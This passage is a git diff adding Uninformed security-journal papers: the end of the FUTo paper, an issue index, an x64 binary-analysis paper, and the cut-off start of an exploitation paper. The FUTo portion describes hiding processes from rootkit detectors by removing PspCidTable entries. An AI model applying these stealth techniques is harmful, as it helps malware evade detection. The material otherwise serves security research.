objects +within the PspCidTable. + +There were some design considerations when implementing the new features +in FUTo. The first was that, like the ExMapHandleXXX functions, the +PspCidTable is not exported by the kernel. In order to overcome this, +FUTo automatically detects the PspCidTable by finding the +PsLookupProcessByProcessId function and disassembling it looking for the +first function call. At the time of this writing, the first function +call is always to ExMapHandleToPointer. ExMapHandleToPointer takes the +PspCidTable as its first parameter. Using this knowledge, it is fairly +straightforward to find the PspCidTable. + +PsLookupProcessByProcessId: + mov edi, edi + push ebp + mov ebp, esp + push ebx + push esi + mov eax, large fs:124h + push [ebp+arg_4] + mov esi, eax + dec dword ptr [esi+0D4h] + push PspCidTable + call ExMapHandleToPointer + +A more robust method to find the PspCidTable could be written as this +algorithm will fail if even simple compiler optimizations are made on +the kernel. Opc0de wrote a more robust method to detect non-exported +variables like PspCidTable, PspActiveProcessHead, PspLoadedModuleList, +etc. Opc0des method does not requires memory scanning like the method +currently used in FUTo. Instead Opc0de found that the KdVersionBlock +field in the Process Control Region structure pointed to a structure +KDDEBUGGER_DATA32. The structure looks like this: + +typedef struct _KDDEBUGGER_DATA32 { + + DBGKD_DEBUG_DATA_HEADER32 Header; + ULONG KernBase; + ULONG BreakpointWithStatus; // address of breakpoint + ULONG SavedContext; + USHORT ThCallbackStack; // offset in thread data + USHORT NextCallback; // saved pointer to next callback frame + USHORT FramePointer; // saved frame pointer + USHORT PaeEnabled:1; + ULONG KiCallUserMode; // kernel routine + ULONG KeUserCallbackDispatcher; // address in ntdll + + ULONG PsLoadedModuleList; + ULONG PsActiveProcessHead; + ULONG PspCidTable; + + ULONG ExpSystemResourcesList; + ULONG ExpPagedPoolDescriptor; + ULONG ExpNumberOfPagedPools; + + [...] + + ULONG KdPrintCircularBuffer; + ULONG KdPrintCircularBufferEnd; + ULONG KdPrintWritePointer; + ULONG KdPrintRolloverCount; + + ULONG MmLoadedUserImageList; + +} KDDEBUGGER_DATA32, *PKDDEBUGGER_DATA32; + +As the reader can see the structure contains pointers to many of the +commonly needed/used non-exported variables. This is one more robust +method to finding the PspCidTable and other variables like it. + +The second design consideration was a little more troubling. When FUTo +removes an object from the PspCidTable, the HANDLE_ENTRY is replaced with +NULLs representing the fact that the process "does not exist." The +problem then occurs when the process that is hidden (and has no +PspCidTable entries) is closed. When the system tries to close the +process, it will index into the PspCidTable and dereference a null +object causing a blue screen. The solution to this problem is simple but +not elegant. First, FUTo sets up a process notify routine by calling +PsSetCreateProcessNotifyRoutine. The callback function will be invoked +whenever a process is created, but more importantly it will be called +whenever a process is deleted. The callback executes before the hidden +process is terminated; therefore, it gets called before the system +crashes. When FUTo deletes the indexes that contain objects that point +to the rogue process, FUTo will save the value of the HANDLE_ENTRYs and +the index for later use. When the process is closed, FUTo will restore +the objects before the process is closed allowing the system to +dereference valid objects. + +5) Conclusion + +The catch phrase in 2005 was, ``We are raising the bar [again] for +rootkit detection''. Hopefully the reader has walked away with a better +understanding of how the top rootkit detection programs are detecting +hidden processes and how they can be improved. Some readers may ask +"What can I do?" Well, the simple solution is not to connect to the +Internet, but a combination of using both Blacklight, IceSword and +Rootkit Revealer will greatly help your chances of staying rootkit free. +A new tool called RAIDE (Rootkit Analysis Identification Elimination) +will be unveiled in the coming months at Blackhat Amsterdam. This new +tool does not suffer from the problems brought forth here. + +Bibliography + +Blacklight Homepage. F-Secure Blacklight +http://www.f-secure.com/blacklight/ + + +FU Project Page. FU +http://www.rootkit.com/project.php?id=12 + + +IceSword Homepage. IceSword +http://www.xfocus.net/tools/200505/1032.html + + +LordPE Homepage. LordPE Info +http://mitglied.lycos.de/yoda2k/LordPE/info.htm + + +Opc0de. 2005. How to get some hidden kernel variables without scanning +http://www.rootkit.com/newsread.php?newsid=101 + + +Rohitabs API Monitor. API Monitor - Spy on API calls +http://www.rohitab.com/apimonitor/ + + +Russinovich, Solomon. Microsoft Windows Internals Fourth Edition. + + +Silberman. RAIDE:Rootkit Analysis Identification Elimination +http://www.blackhat.com/html/bh-europe-06/bh-eu-06-speakers.htmlSilberman diff --git a/uninformed/3.txt b/uninformed/3.txt new file mode 100644 index 0000000..5f583b7 --- /dev/null +++ b/uninformed/3.txt @@ -0,0 +1,35 @@ +Engineering in Reverse +Bypassing PatchGuard on Windows x64 +skape & Skywing +The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors from modifying certain critical operating system structures. These structures include things like specific system images, the SSDT, the IDT, the GDT, and certain critical processor MSRs. This feature is intended to ensure kernel stability by preventing uncondoned behavior, such as hooking. However, it also has the side effect of preventing legitimate products from working properly. For that reason, this paper will serve as an in-depth analysis of PatchGuard's inner workings with an eye toward techniques that can be used to bypass it. Possible solutions will also be proposed for the bypass techniques that are suggested. +pdf | txt | html + +Exploitation Technology +Windows Kernel-mode Payload Fundamentals +bugcheck & skape +This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows. +pdf | txt | html + +Fuzzing +Analyzing Common Binary Parser Mistakes +Orlando Padilla +With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it all is unfortunate; no one cares enough. These bugs have been around for some time now, but have only recently gained media attention due to the large number of vulnerabilities being released. Researchers have been finding more elaborate and passive attack vectors for these bugs, some of which can even leverage a remote compromise. +pdf | txt | code.tgz | html + +General Research +Attacking NTLM with Precomputed Hashtables +Warlord +Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with Microsoft's Windows being no exception. Due to errors in the design of the password encryption scheme, especially in the LanMan(LM) scheme, Windows has a bad track in this field of information security. Especially in the last couple of years, where the outdated DES encryption algorithm that LanMan is based on faced more and more processing power in the average household, combined with ever increasing harddisk size, made it crystal clear that LanMan nowadays is not just outdated, but even antiquated. +pdf | txt | html + +Linux Improvised Userland Scheduler Virus +Izik +This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to invading into other processes, and the userland scheduler provides a way to make the injected code coexist with the original process code. This allows the virus to remain stealthy and active inside an infected process. +pdf | txt | html + +Rootkit Technology +FUTo +Peter Silberman & C.H.A.O.S. +Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms used by rootkit detectors, such as BlackLight, attempt to find what the rootkit is hiding instead of simply detecting the presence of the rootkit's hooks. This paper will discuss an algorithm that is used by both Blacklight and IceSword to detect hidden processes. This paper will also document current weaknesses in the rootkit detection field and introduce a more complete stealth technique implemented as a prototype in FUTo. +pdf | txt | code.tgz | html + diff --git a/uninformed/4.4.txt b/uninformed/4.4.txt new file mode 100644 index 0000000..9f0b862 --- /dev/null +++ b/uninformed/4.4.txt @@ -0,0 +1,686 @@ +Improving Automated Analysis of Windows x64 Binaries +April 2006 +skape +mmiller@hick.org + + +1) Foreword + +Abstract: As Windows x64 becomes a more prominent platform, it will +become necessary to develop techniques that improve the binary analysis +process. In particular, automated techniques that can be performed +prior to doing code or data flow analysis can be useful in getting a +better understanding for how a binary operates. To that point, this +paper gives a brief explanation of some of the changes that have been +made to support Windows x64 binaries. From there, a few basic +techniques are illustrated that can be used to improve the process of +identifying functions, annotating their stack frames, and describing +their exception handler relationships. Source code to an example IDA +plugin is also included that shows how these techniques can be +implemented. + +Thanks: The author would like to thank bugcheck, sh0k, jt, spoonm, and +Skywing. + +Update: The article in MSDN magazine by Matt Pietrek was +published after this article was written. However, it contains a +lot of useful information and touches on many of the same topics +that this article covers in the background chapter. The article can +be found here: +http://msdn.microsoft.com/msdnmag/issues/06/05/x64/default.aspx. + +With that, on with the show + + +2) Introduction + +The demand for techniques that can be used to improve the analysis +process of Windows x64 binaries will only increase as the Windows x64 +platform becomes more accepted and used in the market place. There is a +deluge of useful information surrounding techniques that can be used to +perform code and data flow analysis that is also applicable to the x64 +architecture. However, techniques that can be used to better annotate +and streamline the initial analysis phases, such as identifying +functions and describing their stack frames, is still a ripe area for +improvement at the time of this writing. For that reason, this paper +will start by describing some of the changes that have been made to +support Windows x64 binaries. This background information is useful +because it serves as a basis for understanding a few basic techniques +that may be used to improve some of the initial analysis phases. During +the course of this paper, the term Windows x64 binary will simply be +reduced to x64 binary in the interest of brevity. + + +3) Background + +Prior to diving into some of the analysis techniques that can be +performed on x64 binaries, it's first necessary to learn a bit about +some of the changes that were made to support the x64 architecture. +This chapter will give a very brief explanation of some of the things +that have been introduced, but will by no means attempt to act as an +authoritative reference. + + +3.1) PE32+ Image File Format + +The image file format for the x64 platform is known as PE32+. As one +would expect, the file format is derived from the PE file format with +only very slight modifications. For instance, 64-bit binaries contain +an IMAGE_OPTIONAL_HEADER64 rather than an IMAGE_OPTIONAL_HEADER. The +differences between these two structures are described in the table +below: + + Field | PE | PE32+ + -------------------+-------+------------------------------ + BaseOfData | ULONG | Removed from structure + ImageBase | ULONG | ULONGLONG + SizeOfStackReserve | ULONG | ULONGLONG + SizeOfStackCommit | ULONG | ULONGLONG + SizeOfHeapReserve | ULONG | ULONGLONG + SizeOfHeapCommit | ULONG | ULONGLONG + -------------------+-------+------------------------------ + +In general, any structure attribute in the PE image that made reference +to a 32-bit virtual address directly rather than through an RVA (Relative +Virtual Address) has been expanded to a 64-bit attribute in PE32+. Other +examples of this include the IMAGE_TLS_DIRECTORY structure and the +IMAGE_LOAD_CONFIG_DIRECTORY structure. + +With the exception of certain field offsets in specific structures, +the PE32+ image file format is largely backward compatible with PE +both in use and in form. + + +3.2) Calling Convention + +The calling convention used on x64 is much simpler than those used for +x86. Unlike x86, where calling conventions like stdcall, cdecl, and +fastcall are found, the x64 platform has only one calling convention. +The calling convention that it uses is a derivative of fastcall where +the first four parameters of a function are passed by register and any +remaining parameters are passed through the stack. Each parameter is 64 +bits wide (8 bytes). The first four parameters are passed through the +RCX, RDX, R8, and R9 registers, respectively. For scenarios where +parameters are passed by value or are otherwise too large to fit into +one of the 64-bit registers, appropriate steps are taken as documented +in [4]. + + +3.2.1) Stack Frame Layout + +The stack frame layout for functions on x64 is very similar to x86, but +with a few key differences. Just like x86, the stack frame on x64 is +divided into three parts: parameters, return address, and locals. These +three parts are explained individually below. One of the important +principals to understand when it comes to x64 stack frames is that the +stack does not fluctuate throughout the course of a given function. In +fact, the stack pointer is only permitted to change in the context of a +function prologue. Note that things like alloca are handled in a special +manner[7]. Parameters are not pushed and popped from the stack. Instead, +stack space is pre-allocated for all of the arguments that would be +passed to child functions. This is done, in part, for making it easier +to unwind call stacks in the event of an exception. The table below +describes a typical stack frame: + + + +-------------------------+ + | Stack parameter area | + +-------------------------+ + | Register parameter area | + +-------------------------+ + | Return address | + +-------------------------+ + | Locals | + +-------------------------+ + + +== Parameters + + +The calling convention for functions on x64 dictates that the first four +parameters are passed via register with any remaining parameters, +starting with parameter five, spilling to the stack. Given that the +fifth parameter is the first parameter passed by the stack, one would +think that the fifth parameter would be the value immediately adjacent +to the return address on the stack, but this is not the case. Instead, +if a given function calls other functions, that function is required to +allocate stack space for the parameters that are passed by register. +This has the affect of making it such that the area of the stack +immediately adjacent to the return address is 0x20 bytes of +uninitialized storage for the parameters passed by register followed +immediately by any parameters that spill to the stack (starting with +parameter five). The area of storage allocated on the stack for the +register parameters is known as the register parameter area whereas the +area of the stack for parameters that spill onto the stack is known as +the stack parameter area. The table below illustrates what the +parameter portion of a stack frame would look like after making a call +to a function: + + +-------------------------+ + | Parameter 6 | + +-------------------------+ + | Parameter 5 | + +-------------------------+ + | Parameter 4 (R9 Home) | + +-------------------------+ + | Parameter 3 (R8 Home) | + +-------------------------+ + | Parameter 2 (RDX Home) | + +-------------------------+ + | Parameter 1 (RCX Home) | + +-------------------------+ + | Return address | + +-------------------------+ + + +To emphasize further, the register parameter area is always allocated, +even if the function being called has fewer than four arguments. This +area of the stack is effectively owned by the called function, and as +such can be used for volatile storage during the course of the function +call. In particular, this area is commonly used to persist the values +of register parameters. This area is also referred to as the ``home'' +address for register parameters. However, it can also be used to save +non-volatile registers. To someone familiar with x86 it may seem +slightly odd to see functions modifying areas of the stack beyond the +return address. The key is to remember that the 0x20 bytes immediately +adjacent to the return address are owned by the called function. One +important side affect of this requirement is that if a function calls +other functions, the calling function's minimum stack allocation will be +0x20 bytes. This accounts for the register parameter area that will be +used by called functions. + +The obvious question to ask at this point is why it's the caller's +responsibility to allocate stack space for use by the called function. +There are a few different reasons for this. Perhaps most importantly, +it makes it possible for the called function to take the address of a +parameter that's passed via a register. Furthermore, the address that +is returned for the parameter must be at a location that is contiguous +in relation to the other parameters. This is particularly necessary for +variadic functions, which require a contiguous list of parameters, but +may also be necessary for applications that make assumptions about being +able to reference parameters in relation to one another by address. +Invalidating this assumption would introduce source compatibility +problems. + +For more information on parameter passing, refer to the MSDN +documentation[4,7]. + +== Return Address + +Due to the fact that pointers are 64 bits wide on x64, the return +address location on the stack is eight bytes instead of four. + +== Locals + +The locals portion of a function's stack frame encompasses both local +variables and saved non-volatile registers. For x64, the general +purpose registers described as non-volatile are RBP, RBX, RDI, RSI, and +R12 through R15[5]. + + +3.3) Exception Handling on x64 + +On x86, exception handling is accomplished through the adding and +removing of exception registration records on a per-thread basis. When +a function is entered that makes use of an exception handler, it +constructs an exception registration record on the stack that is +composed of an exception handler (a function pointer), and a pointer to +the next element in the exception handler list. This list of exception +registration records is stored relative to fs:[0]. When an exception +occurs, the exception dispatcher walks the list of exception handlers +and calls each one, checking to see if they are capable of handling the +exception that occurred. While this approach works perfectly fine, +Microsoft realized that there were better ways to go about it. First of +all, the adding and removing of exception registration records that are +static in the context of an execution path adds needless execution +overhead. Secondly, the security implications of storing a function +pointer on the stack have been made very obvious, especially in the case +where that function pointer can be called after an exception is +generated (such as an access violation). Finally, the process of +unwinding call frames is muddled with limitations, thus making it a more +complicated process than it might otherwise need to be[6]. + +With these things in mind, Microsoft completely revamped the way +exception handling is accomplished on x64. The major changes center +around the approaches Microsoft has taken to solve the three major +deficiencies found on x86. First, Microsoft solved the execution time +overhead issue of adding and removing exception handlers by moving all +of the static exception handling information into a static location in +the binary. This location, known as the .pdata section, is described by +the PE32+'s Exception Directory. The structure of this section will be +described in the exception directory subsection. By eliminating the +need to add and remove exception handlers on the fly, Microsoft has also +eliminated the security issue found on x86 with regard to overwriting +the function pointer of an exception handler. Perhaps most importantly, +the process involved in unwinding call frames has been drastically +improved through the formalization of the frame unwinding process. This +will be discussed in the subsection on unwind information. + + +3.3.1) Exception Directory + +The Exception Directory of a PE32+ binary is used to convey the complete +list of functions that could be found in a stack frame during an unwind +operation. These functions are known as non-leaf functions, and they +are qualified as such if they either allocate space on the stack or call +other functions. The IMAGE_RUNTIME_FUNCTION_ENTRY data structure is used +to describe the non-leaf functions, as shown below[1]: + +typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY { + ULONG BeginAddress; + ULONG EndAddress; + ULONG UnwindInfoAddress; +} _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY; + +The BeginAddress and EndAddress attributes are RVAs that represent the +range of the non-leaf function. The UnwindInfoAddress will be discussed +in more detail in the following subsection on unwind information. The +Exception directory itself is merely an array of +IMAGE_RUNTIME_FUNCTION_ENTRY structures. When an exception occurs, the +exception dispatcher will enumerate the array of runtime function +entries until it finds the non-leaf function associated with the address +it's searching for (typically a return address). + + +3.3.2) Unwind Information + +For the purpose of unwinding call frames and dispatching exceptions, +each non-leaf function has some non-zero amount of unwind information +associated with it. This association is made through the +UnwindInfoAddress attribute of the IMAGE_RUNTIME_FUNCTION_ENTRY +structure. The UnwindInfoAddress itself is an RVA that points to an +UNWIND_INFO structure which is defined as[8]: + +typedef struct _UNWIND_INFO { + UBYTE Version : 3; + UBYTE Flags : 5; + UBYTE SizeOfProlog; + UBYTE CountOfCodes; + UBYTE FrameRegister : 4; + UBYTE FrameOffset : 4; + UNWIND_CODE UnwindCode[1]; +/* UNWIND_CODE MoreUnwindCode[((CountOfCodes + 1) & ~1) - 1]; +* union { +* OPTIONAL ULONG ExceptionHandler; +* OPTIONAL ULONG FunctionEntry; +* }; +* OPTIONAL ULONG ExceptionData[]; */ +} UNWIND_INFO, *PUNWIND_INFO; + +This structure, at a very high level, describes a non-leaf function in +terms of its prologue size and frame register usage. Furthermore, it +describes the way in which the stack is set up when the prologue for +this non-leaf function is executed. This is provided through an array +of codes as accessed through the UnwindCode array. This array is +composed of UNWIND_CODE structures which are defined as[8]: + +typedef union _UNWIND_CODE { + struct { + UBYTE CodeOffset; + UBYTE UnwindOp : 4; + UBYTE OpInfo : 4; + }; + USHORT FrameOffset; +} UNWIND_CODE, *PUNWIND_CODE; + +In order to properly unwind a frame, the exception dispatcher needs to +be aware of the amount of stack space allocated in that frame, the +locations of saved non-volatile registers, and anything else that has to +do with the stack. This information is necessary in order to be able to +restore the caller's stack frame when an unwind operation occurs. By +having the compiler keep track of this information at link time, it's +possible to emulate the unwind process by inverting the operations +described in the unwind code array for a given non-leaf function. + +Aside from conveying stack frame set up, the UNWIND_INFO structure may +also describe exception handling information, such as the exception +handler that is to be called if an exception occurs. This information +is conveyed through the ExceptionHandler and ExceptionData attributes of +the structure which exist only if the UNW_FLAGE_HANDLER flag is set in the +Flags field. + +For more details on the format and use of these structures for unwinding +as well as a complete description of the unwind process, please refer to +the MSDN documentation[2]. + + +4) Analysis Techniques + +In order to improve the analysis of x64 binaries, it is important to try +to identify techniques that can aide in the identification or extraction +of useful information from the binary in an automated fashion. This +chapter will focus on a handful of simple techniques that can be used to +better annotate or describe the behavior of an x64 binary. These +techniques intentionally do not cover the analysis of code or data flow +operations. Such techniques are outside of the scope of this paper. + + +4.1) Exception Directory Enumeration + +Given the explanation of the Exception Directory found within PE32+ +images and its application to the exception dispatching process, it can +be seen that x64 binaries have a lot of useful meta-information stored +within them. Given that this information is just sitting there waiting +to be used, it makes sense to try to take advantage of it in ways that +make it possible to better annotate or understand an x64 binary. The +following subsections will describe different things that can be +discovered by digging deeper into the contents of the exception +directory. + + +4.1.1) Functions + +One of the most obvious uses for the information stored in the exception +directory is that it can be used to discover all of the non-leaf +functions in a binary. This is cool because it works regardless of +whether or not you actually have symbols for the binary, thus providing +an easy technique for identifying the majority of the functions in a +binary. The process taken to do this is to simply enumerate the array +of IMAGE_RUNTIME_FUNCTION_ENTRY structures stored within the exception +directory. The BeginAddress attribute of each entry marks the starting +point of a non-leaf function. There's a catch, though. Not all of the +runtime function entries are actually associated with the entry point of +a function. The fact of the matter is that entries can also be +associated with various portions of an actual function where stack +modifications are deferred until necessary. In these cases, the unwind +information associated with the runtime function entry is chained with +another runtime function entry. + +The chaining of runtime function entries is documented as being +indicated through the UNW_FLAG_CHAININFO flag in the Flags attribute of +the UNWIND_INFO structure. If this flag is set, the area of memory +immediately following the last UNWIND_CODE in the UNWIND_INFO structure +is an IMAGE_RUNTIME_FUNCTION_ENTRY structure. The UnwindInfoAddress of +this structure indicates the chained unwind information. Aside from +this, chaining can also be indicated through an undocumented flag that +is stored in the least-significant bit of the UnwindInfoAddress. If the +least-significant bit is set, then it is implied that the runtime +function entry is directly chained to the IMAGE_RUNTIME_FUNCTION_ENTRY +structure that is found at the RVA conveyed by the UnwindInfoAddress +attribute with the least significant bit masked off. The reason +chaining can be indicated in this fashion is because it is a requirement +that unwind information be four byte aligned. + +With chaining in mind, it is safe to assume that a runtime function +entry is associated with the entry point of a function if its unwind +information is not chained. This makes it possible to deterministically +identify the entry point of all of the non-leaf functions. From there, +it should be possible to identify all of the leaf functions through +calls that are made to them by non-leaf functions. This requires code +flow analysis, though. + + +4.1.2) Stack Frame Annotation + +The unwind information associated with each non-leaf function +contains lots of useful meta-information about the structure of the +stack. It provides information about the amount of stack space +allocated, the location of saved non-volatile registers, and whether or +not a frame register is used and what relation it has to the rest of the +stack. This information is also described in terms of the location of +the instruction that actually performs the operation associated with the +task. Take the following unwind information obtained through dumpbin +/unwindinfo as an example: + + + 0000060C 00006E50 00006FF0 000081FC _resetstkoflw + Unwind version: 1 + Unwind flags: None + Size of prologue: 0x47 + Count of codes: 18 + Frame register: rbp + Frame offset: 0x20 + Unwind codes: + 3C: SAVE_NONVOL, register=r15 offset=0x98 + 38: SAVE_NONVOL, register=r14 offset=0xA0 + 31: SAVE_NONVOL, register=r13 offset=0xA8 + 2A: SAVE_NONVOL, register=r12 offset=0xD8 + 23: SAVE_NONVOL, register=rdi offset=0xD0 + 1C: SAVE_NONVOL, register=rsi offset=0xC8 + 15: SAVE_NONVOL, register=rbx offset=0xC0 + 0E: SET_FPREG, register=rbp, offset=0x20 + 09: ALLOC_LARGE, size=0xB0 + 02: PUSH_NONVOL, register=rbp + + +First and foremost, one can immediately see that the size of the +prologue used in the resetstkoflw function is 0x47 bytes. This prologue +accounts for all of the operations described in the unwind codes array. +Furthermore, one can also tell that the function uses a frame pointer, +as conveyed through rbp, and that the frame pointer offset is 0x20 bytes +relative to the current stack pointer at the time the frame pointer +register is established. + +As one would expect with an unwind operation, the unwind codes +themselves are stored in the opposite order of which they are executed. +This is necessary because of the effect on the stack each unwind code +can have. If they are processed in the wrong order, then the unwind +operation will get invalid data. For example, the value obtained +through a pop rbp instruction will differ depending on whether or not it +is done before or after an add rsp, 0xb0. + +For the purposes of annotation, however, the important thing to keep in +mind is how all of the useful information can be extracted. In this +case, it is possible to take all of the information the unwind codes +provide and break it down into a definition of the stack frame layout +for a function. This can be accomplished by processing the unwind codes +in the order that they would be executed rather than the order that they +appear in the array. There's one important thing to keep in mind when +doing this. Since unwind information can be chained, it is a +requirement that the full chain of unwind codes be processed in +execution order. This can be accomplished by walking the chain of +unwind information and building an execution order list of all of the +unwind codes. + +Once the execution order list of unwind codes is collected, the next +step is to simply enumerate each code, checking to see what operation it +performs and building out the stack frame across each iteration. Prior +to enumerating each code, the state of the stack pointer should be +initialized to 0 to indicate an empty stack frame. As data is allocated +on the stack, the stack pointer should be adjusted by the appropriate +amount. The actions that need to be taken for each unwind operation +that directly effect the stack pointer are described below. + + 1. UWOP_PUSH_NONVOL + + When a non-volatile register is pushed onto the stack, such as + through a push rbp, the current stack pointer needs to be + decremented by 8 bytes. + + 2. UWOP_ALLOC_LARGE and UWOP_ALLOC_SMALL + + When stack space is allocated, the current stack pointer needs to + be adjusted by the amount indicated. + + 3. UWOP_SET_FPREG + + When a frame pointer is defined, its offset relative to the base of + the stack should be saved using the current value of the stack + pointer. + + +As the enumeration unwind codes occurs, it is also possible to annotate +the different locations on the stack where non-volatile registers are +preserved. For instance, given the example unwind information above, it +is known that the R15 register is preserved at [rsp + 0x98]. Therefore, +we can annotate this location as [rsp + SavedR15]. + +Beyond annotating preserved register locations on the stack, we can also +annotate the instructions that perform operations that effect the stack. +For instance, when a non-volatile register is pushed, such as through +push rbp, we can annotate the instruction that performs that operation +as preserving rbp on the stack. The location of the instruction that's +associated with the operation can be determined by taking the +BeginAddress associated with the unwind information and adding it to the +CodeOffset attribute of the UNWIND_CODE that is being processed. It is +important to note, however, that the CodeOffset attribute actually +points to the first byte of the instruction immediately following the +one that performs the actual operation, so it is necessary to back track +in order to determine the start of the instruction that actually +performs the operation. + +As a result of this analysis, one can take the prologue of the +resetstkoflw function and automatically convert it from: + +.text:100006E50 push rbp +.text:100006E52 sub rsp, 0B0h +.text:100006E59 lea rbp, [rsp+0B0h+var_90] +.text:100006E5E mov [rbp+0A0h], rbx +.text:100006E65 mov [rbp+0A8h], rsi +.text:100006E6C mov [rbp+0B0h], rdi +.text:100006E73 mov [rbp+0B8h], r12 +.text:100006E7A mov [rbp+88h], r13 +.text:100006E81 mov [rbp+80h], r14 +.text:100006E88 mov [rbp+78h], r15 + + +to a version with better annotation: + + +.text:100006E50 push rbp ; SavedRBP +.text:100006E52 sub rsp, 0B0h +.text:100006E59 lea rbp, [rsp+20h] +.text:100006E5E mov [rbp+0A0h], rbx ; SavedRBX +.text:100006E65 mov [rbp+98h+SavedRSI], rsi ; SavedRSI +.text:100006E6C mov [rbp+98h+SavedRDI], rdi ; SavedRDI +.text:100006E73 mov [rbp+98h+SavedR12], r12 ; SavedR12 +.text:100006E7A mov [rbp+98h+SavedR13], r13 ; SavedR13 +.text:100006E81 mov [rbp+98h+SavedR14], r14 ; SavedR14 +.text:100006E88 mov [rbp+98h+SavedR15], r15 ; SavedR15 + + +While such annotation may is not entirely useful to understanding +the behavior of the binary, it at least simplifies the process of +understanding the layout of the stack. + + +4.1.3) Exception Handlers + +The unwind information structure for a non-leaf function also contains +useful information about the way in which exceptions within that +function should be dispatched. If the unwind information associated +with a function has the UNW_FLAG_EHANDLER or UNW_FLAG_UHANDLER flag set, +then the function has an exception handler associated with it. The +exception handler is conveyed through the ExceptionHandler attribute +which comes immediately after the array of unwind codes. This handler is +defined as being a language-specific handler for processing the +exception. More specifically, the exception handler is specific to the +semantics associated with a given programming language, such as C or +C++[3]. For C, the language-specific exception handler is named +__C_specific_handler. + +Given that all C functions that handle exceptions will have the same +exception handler, how does the function-specific code for handling an +exception actually get called? For the case of C functions, the +function-specific exception handler is stored in a scope table in the +ExceptionData portion of the UNWIND_INFO structure. Other languages may +have a different ExceptionData definition. This C scope table is defined +by the structures shown below: + +typedef struct _C_SCOPE_TABLE_ENTRY { + ULONG Begin; + ULONG End; + ULONG Handler; + ULONG Target; +} C_SCOPE_TABLE_ENTRY, *PC_SCOPE_TABLE_ENTRY; + +typedef struct _C_SCOPE_TABLE { + ULONG NumEntries; + C_SCOPE_TABLE_ENTRY Table[1]; +} C_SCOPE_TABLE, *PC_SCOPE_TABLE; + +The scope table entries describe the function-specific exception +handlers in relation to the specific areas of the function that they +apply to. Each of the attributes of the C_SCOPE_TABLE_ENTRY is expressed +as an RVA. The Target attribute defines the location to transfer +control to after the exception is handled. + +The reason why all of the exception handler information is useful is +because it makes it possible to annotate a function in terms of what +exception handlers may be called during its execution. It also makes it +possible to identify the exception handler functions that may otherwise +not be found due to the fact that they are executed indirectly. For +example, the function CcAcquireByteRangeForWrite in ntoskrnl.exe can be +annotated in the following fashion: + + +.text:0000000000434520 ; Exception handler: __C_specific_handler +.text:0000000000434520 ; Language specific handler: sub_4C7F30 +.text:0000000000434520 +.text:0000000000434520 CcAcquireByteRangeForWrite proc near + + +4.2) Register Parameter Area Annotation + +Given the requirement that the register parameter area be allocated on +the stack in the context of a function that calls other functions, it is +possible to statically annotate specific portions of the stack frame for +a function as being the location of the caller's register parameter +area. Furthermore, the location of a given function's register +parameter area that is to be used by called functions can also be +annotated. + +The location of the register parameter area is always at a fixed +location in a stack frame. Specifically, it immediately follows the +return address on the stack. If annotations are added for CallerRCX at +offset 0x8, CallerRDX at offset 0x10, CallerR8 at offset 0x18, and +CallerR9 at offset 0x20, it is possible to get a better view of the +stack frame for a given function. It also makes it easier to understand +when and how this region of the stack is used by a function. For +instance, the CcAcquireByteRangeForWrite function in ntoskrnl.exe makes +use of this area to store the values of the first four parameters: + + +.text:0000000000434520 mov [rsp+CallerR9], r9 +.text:0000000000434525 mov dword ptr [rsp+CallerR8], r8d +.text:000000000043452A mov [rsp+CallerRDX], rdx +.text:000000000043452F mov [rsp+CallerRCX], rcx + + +5) Conclusion + +This paper has presented a few basic approaches that can be used to +extract useful information from an x64 binary for the purpose of +analysis. By analyzing the unwind information associated with +functions, it is possible to get a better understanding for how a +function's stack frame is laid out. Furthermore, the unwind information +makes it possible to describe the relationship between a function and +its exception handler(s). Looking toward the future, x64 is likely to +become the standard architecture given Microsoft's adoption of it as +their primary architecture. With this in mind, coming up with +techniques to better automate the binary analysis process will become +more necessary. + + +Bibliography + +[1] Microsoft Corporation. ntimage.h. + 3790 DDK header files. + +[2] Microsoft Corporation. Exception Handling (x64). + http://msdn2.microsoft.com/en-us/library/1eyas8tf(VS.80).aspx; + accessed Apr 25, 2006. + +[3] Microsoft Corporation. The Language Specific Handler. + http://msdn2.microsoft.com/en-us/library/b6sf5kbd(VS.80).aspx; + accessed Apr 25, 2006. + +[4] Microsoft Corporation. Parameter Passing. + http://msdn2.microsoft.com/en-us/library/zthk2dkh.aspx; + accessed Apr 25, 2006. + +[5] Microsoft Corporation. Register Usage. + http://msdn2.microsoft.com/en-us/library/9z1stfyw(VS.80).aspx; + accessed Apr 25, 2006. + +[6] Microsoft Corporation. SEH in x86 Environments. + http://msdn2.microsoft.com/en-US/library/ms253960.aspx; + accessed Apr 25, 2006. + +[7] Microsoft Corporation. Stack Usage. + http://msdn2.microsoft.com/en-us/library/ew5tede7.aspx; + accessed Apr 25, 2006. + +[8] Microsoft Corporation. Unwind Data Definitions in C. + http://msdn2.microsoft.com/en-us/library/ssa62fwe(VS.80).aspx; + accessed Apr 25, 2006. diff --git a/uninformed/4.5.txt b/uninformed/4.5.txt new file mode 100644 index 0000000..4c52983 --- /dev/null +++ b/uninformed/4.5.txt @@ -0,0 +1,711 @@ +Exploiting the Otherwise Unexploitable on Windows +skywing, skape +May 2006 + + +1) Foreword + +Abstract: This paper describes a technique that can be applied in +certain situations to gain arbitrary code execution through software +bugs that would not otherwise be exploitable, such as NULL pointer +dereferences. To facilitate this, an attacker gains control of the +top-level unhandled exception filter for a process in an indirect +fashion. While there has been previous work [1, 3] illustrating the +usefulness in gaining control of the top-level unhandled exception +filter, Microsoft has taken steps in XPSP2 and beyond, such as function +pointer encoding[4], to prevent attackers from being able to overwrite +and control the unhandled exception filter directly. While this +security enhancement is a marked improvement, it is still possible for +an attacker to gain control 